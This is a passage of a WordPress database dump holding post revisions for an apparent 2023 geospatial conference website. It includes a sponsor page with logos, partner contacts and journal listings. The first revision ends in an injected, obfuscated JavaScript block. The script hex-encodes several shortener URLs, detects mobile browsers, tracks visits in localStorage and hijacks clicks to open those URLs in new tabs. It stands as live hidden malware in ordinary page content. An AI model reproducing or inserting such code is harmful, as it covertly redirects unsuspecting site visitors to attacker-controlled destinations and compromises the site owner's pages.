class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-26 20:16:26','2023-08-26 20:16:26','',3066,'https://gsw2023.com/?p=5404',0,'revision','',0),
(5405,1,'2023-08-26 20:19:09','2023-08-26 20:19:09','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /><p><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey1.jpg\" alt=\"\" width=\"246\" height=\"185\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 